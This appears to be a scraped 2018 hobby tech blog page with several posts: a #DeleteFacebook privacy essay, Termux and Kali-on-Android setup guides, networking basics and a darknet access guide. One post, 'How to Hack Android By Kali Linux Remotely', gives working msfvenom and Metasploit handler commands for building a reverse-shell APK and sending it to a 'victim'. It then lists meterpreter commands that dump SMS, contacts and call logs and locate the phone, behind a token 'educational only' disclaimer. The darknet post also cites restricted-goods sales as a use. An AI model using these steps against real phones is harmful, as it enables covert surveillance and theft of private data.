Wednesday, 28 March 2018

#Delete Facebook hashtag Gaining Steam



It’s been quite the week for Facebook. The stock is down and the hashtag #DeleteFacebook is taking off. It’s all about the recent misuse of data from Cambridge Analytica. 
Some ways to prevent your protect data being misused on your Facebook page is by clicking on settings and adjust the settings under ads, apps, and privacy sections.

Mark Bartholomew deleted his Facebook about 4 years ago. He’s a law professor at the University at Buffalo. Bartholomew says he isn’t an overly private person, but he does want some privacy.
“I don’t want everyone to know that about me. I don’t want to be an open book for anybody that watches me online,” said the law professor.
He doesn’t recommend everyone get rid of Facebook, saying the social network is important tool for many around the world. But he does hope this recent data misuse makes Facebook users pay closer attention.

I like Facebook Messenger and I like that Facebook is now a glorified version of OAuth. It’s a useful tool when it is stripped of its power. However, when it is larded with my personal details it is a weapon and a liability.

“We might not be so upset when our data is used to sell us shampoo but when our data is used to sell us a political candidate that strikes closer to home.”

Facebook is a data collection service for those who want to sell you products. It is the definitive channel to target you based on age, sex, geographic location, political leanings, interests, and marital status. It’s an advertiser’s dream and it is wildly expensive in terms of privacy lost and cash spent to steal that privacy. It is the perfect tool for marketers, a user-generated paradise that is now run by devils.

Facebook simply replaced the tools we once used to tell the world of our joys and sorrows and it replaced them with cheap knock-offs that make us less connected, not more. Decades ago, on one coal-fogged winter morning in Krakow, Poland where I was living, I passed Kościół św. Wojciecha with its collection of nekrologi – necrologies – posted on a board in front of the church. There you saw the names of the dead – and sometimes the names of the newly born – and it was there you discovered what was happening in your little corner of the world. The church wasn’t far from the central square – the Rynek – and I walked there thinking about the endless parade of humanity that had walked across those cobbles, stopping for a moment in their hustle at the church yard to see who had died. I stood in the crisp air, flanked by centuries old brickwork, and imagined who once populated this place. This was the place you met your friends and your future partners. It was there you celebrated your successes and mourned your failures. It was there, among other humans, you told the world the story of your life, but told it slant. You witnessed kindnesses and cruelties, you built a world entire based on the happenings in a few square miles.



Share:

Sunday, 25 March 2018

Termux App User Guidance By Nk


How to use Termux App for Android : Terminal Emulator and Linux environment


Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically.Additionall packages are available using the APT package manager.
Developer: Fredrik Fornwall 
Download link: https://termux.com screenshot_20161231-080757


Steps and Instructions :
1.Download Termux app and install it.Open Termux and wait for its complete installation.screenshot_20161231-080835
2.Now, for first time you need to use this command (as shown in screenshot):
 apt update screenshot_20161231-081205
3.Now,we can use  apt command.To know how to use apt , click on Help in Termux app  (Long press in Termux Terminal window will bring menu )

4.To get list of available packages,use this command:
apt list screenshot_20161231-083450
5.To install any package,say python ,use this command:
apt install python screenshot_20161231-081311

5.To search any package,say python. Use this command:
apt search python screenshot_20161231-081311
6.To remove/uninstall a package,say python , use this command:
apt remove python
7.To see installed packages, use this command:
apt list –installed Screenshot_20161231-090507.png
I hope this post will be useful to Android users who want to use Terminal with Linux environment on Android  without need of rooting their phone.

Share:

Kali Linux Installation [For Android]

Tutorial for installing and running Kali Linux on Android smartphones and tablets

Kali Linux is one the best love operating system of white hat hackers, security researchers and pentesters. It offers advanced penetration testing tool and its ease of use means that it should be a part of every security professional’s toolbox.
Penetration testing involves using a variety of tools and techniques to test the limits of security policies and procedures. Now a days more and more apps are available on Android operating system for smartphones and tablets so it becomes worthwhile to have Kali Linux on your smartphone as well.
Kali Linux on Android smartphones and tablets allows researchers and pentesters to perform ” security checks” on things like cracking wep Wi-Fi passwords, finding vulnerabilities/bugs or cracking security on websites.  This opens the door to doing this from a mobile device such as a phone or a tablet.
You can also install Kali Linux Distribution in your
Android smartphone by following the instructions below  :
(Rooted Android smartphone/tablet required for this installation)
Keep the following thing ready for the installation :
  • Fully charged Android Phone
  • Good Internet Connection(For Download Kali Linux images)
  • Root Permission (Rooting Guide for Every Phone)
  • Atleast 5GB  Free Space


Step 1. Download Linux Deploy App in Your Android Mobile from Google Play Store.
Tutorial for installing and running Kali Linux on Android smartphones and tablets
Developer: meefik
Price: Free


Step 2. Install and open Linux Deploy App in your mobile and click on download Icon.
Tutorial for installing and running Kali Linux on Android smartphones and tablets
Step 3. Change the Distribution of Your Linux to Kali Linux.
How to Install and run Kali Linux on any Android Smartphone
Step 4.  Go to Top of the screen and hit the Install button. This will take about 5 minutes provided you have a good Internet connection.
How to Install and run Kali Linux on any Android Smartphone
Step 5. Download Android VNC Viewer App from Google Play Store.
Tutorial for installing and running Kali Linux on Android smartphones and tablets
Developer: RealVNC Limited
Price: Free

Step 6. After installing, enter below  settings in your VNC Android App.
How to Install and run Kali Linux on any Android Smartphone
Step 7. Click the Connect Button in VNC Viewer App.
Now you are done and you will be able to run Kali Linux in your Android smartphone or tablet. 
Share:

How to Hack Android By Kali Linux Remotely [Education Purpose Only]

Hacking of Android phone sounds like very odd, but here our expert trainers give you the best tutorials to hack android phone using Kali Linux. Android phones have a significant share in smartphone market. So targeting Android phone is very good option to hack them quickly. In this complete tutorial on Android hacking, i’ll show you merits and de-merits of Android hacking. So let’s start Hack Android Phones Using Kali Linux.


Before going to learn how to hack android. I must want to tell about Kali Linux through which these hacks works.

Warning:- This Hack is to aware you, and learn this only for Educational Purpose. and Don’t try to do any illegal activity.

About Kali Linux?

Kali Linux is a “Debian-derived Linux distribution designed for digital forensics and penetration testing.” There are lots of functions in Kali Linux like Penetration Testing and Ethical Hacking Linux Distribution etc.

Requirement:

  1. Kali Linux Installed
  2. An Android Phone
  3. A Sharp Brain

Note: In This tutorial here i’m using Acer Laptop as Attacker PC in which Kali linux is installed, and Coolpad Note 3 Android phone as Victim’s Android phone to show you how this actually works.

Steps: How To Hack Android Phones Using Kali Linux.


#1.Open Kali terminal on your PC.
#2.We will be going to use “MSFVENOM” to create a malicious apk file that we will install on the android phone.
#3.Paste these given commands in terminal.
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > root/itechhacks.apk
Hack Android Phones Using Kali Linux


#4. Change the “LHOST” to you local IP address and press enter.
#5. Now open the root folder and send the techhacks.apk to the victim. (As shown in pictures)
#6.  Open a new terminal and enter “msfconsole.”
#7. After opening Metasploit console type these following commands which  are used to create payload handler which will create a connection between the victim and Kali PC.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit
Hack Android Phones Using Kali Linux
Hack Android Phones Using Kali Linux
#8. Change the LHOST to your local IP address. Also, don’t close this terminal.
#9.  Wait until victim opens the file.
#10. After the victim opens the file, you will get a interpreter session. Now open the MSF console terminal and use session -i 1command  to access the session.
#11. In the meterpreter session, you can use various commands that are given below to play different types of tricks on the victim phone like capturing a photo, screenshot, call logs,SMS logs, sending an SMS.
Command Description 
——- ———– 
activity_start Start an Android activity from a Uri string 
check_root Check if device is rooted 
dump_calllog Get call log 
dump_contacts Get contacts list 
dump_sms Get sms messages 
geolocate Get current lat-long using geolocation 
interval_collect Manage interval collection capabilities 
send_sms Sends SMS from target session 
set_audio_mode Set Ringer Mode 
sqlite_query Query a SQLite database from storage 
wlan_geolocate Get current lat-long using WLAN information
Note:
*. Don’t close the msfconsole terminal.
*. This is only for educational purpose.
  • Wrap Up: So above is all about how to hack android phone using Kali Linux easily in 2018. Be safe during perform this hack for testing purpose.If you still face any problem in this hack do let me know in the comment section and don’t be selfish, Share this post with your friends and stay connected. “Hack Android Phone Using Kali Linux”
Share:

Saturday, 24 March 2018

What is Router,Wifi And Broadband?




Broadband-

Broadband internet access is a high-speed connection to the internet that has generally 

superseded the use of dial-up connections. It is provided over your phone line (or 'landline') 

via satellite or cable. It gives constant internet access, usually for a monthly flat fee, 

although limits on downloads and other conditions can sometimes apply. 



Router-



A router is a device that directs data traffic along specific routes. A router sends information, such as email and the content of web pages, between your computer and the network server. It also connects networks and acts as a filter at a ‘gateway’ between them, channelling information to the correct IP address, unique to each computer. A router is also the device that keeps single computers, or entire networks, connected to the internet.

A router can be connected to your computer by wires (or cables). However, more commonly these days, routers are ‘wireless’, allowing several wireless-enabled devices to access the internet at any one time and enabling users to use the devices in various locations within range of the router.



Wifi-

Modems connect to the internet. Wifi, pronounced ‘why-fy’ enables you to connect to a modem without the use of wires. It uses low powered radio waves in the same way that your radio or television does. This means that you can use your laptop or other internet-enabled device anywhere in a building without having to install extra cables or phone lines, as long as the radio waves can reach the modem and it allows you to connect to it..
Wifi also allows several computers, laptops, printers and the like to be connected at any one time, essentially creating a network between all the devices in your home or office. Wifi is also increasingly found in public places, such as libraries and cafés, making it easy to access the internet while on the move, often for free.
Share:

What Is Bandwidth?



'Bandwidth' describes the rate at which data can be transferred to your computer from a website or internet service within a specific time. Therefore the amount of bandwidth you have (the bandwidth 'strength') determines the efficiency and speed of your internet activity – that is, when you open web pages, download files and so on.
A useful analogy is a pipe with water running through it – the wider the pipe, the greater the volume of water that can flow through it. The same applies to bandwidth strength and the flow of the volume of data.
Bandwidth is generally measured in ‘bits per second' or sometimes ‘bytes per second'.

Share:

Friday, 23 March 2018

What is Darknet (How To Use And Access)






What Is Darknet-

Darknet is an overlay network that can only be accessed using specific software,configuration or authorisation.

It is the part of deep web,because its contents are not accessible through search engines.
But it is something more,it is anonymous.
it hosts anonymous websites.

Yeah,you wouldn't know who the owner is unless he explicitly reveal his information.
it offers full anonymity to users too.
Darknet anonymity is usually achieved using an 'onion network'

i am sure you have cut an onion once in your lifetime and you had been crazy about the number of layers it has, same happens when you use an onion network.
There are numbers of encryption layers that hide your identity.


Use Of Darket-

Ok, so you have grasped what Darknet is, Now you may ask me why should you use it.

Well The Reason could be any of them:

1. To Better Protect the privacy right of citizens from targeted and mass surveillance.

2. Whistleblowing and news leaks

3. Hacking and Computer Crime. Maybe,you may want to chat with the most dangerous of hackers.

4. Sale Of Restricted Goods.

5. File Sharing Also


How To Access Darknet-

Well The  Most Popular way to access Darknet is by using TOR Browser.

Technically,it stands for 'The Onion Router' And It Is As Simple As Installing a New Browser.

After That You Would Need A URL or Directory that contians URLs to different websites or class of websites so that you know what to type in into the browser's address bar.

You Can easily get URLs in Onion Directory of Darknet at http://am4wuhz3zifexz5u.onion/  Or Just Google for Darknet Sites.

Make Sure You Are Using Tor Browser.

Share: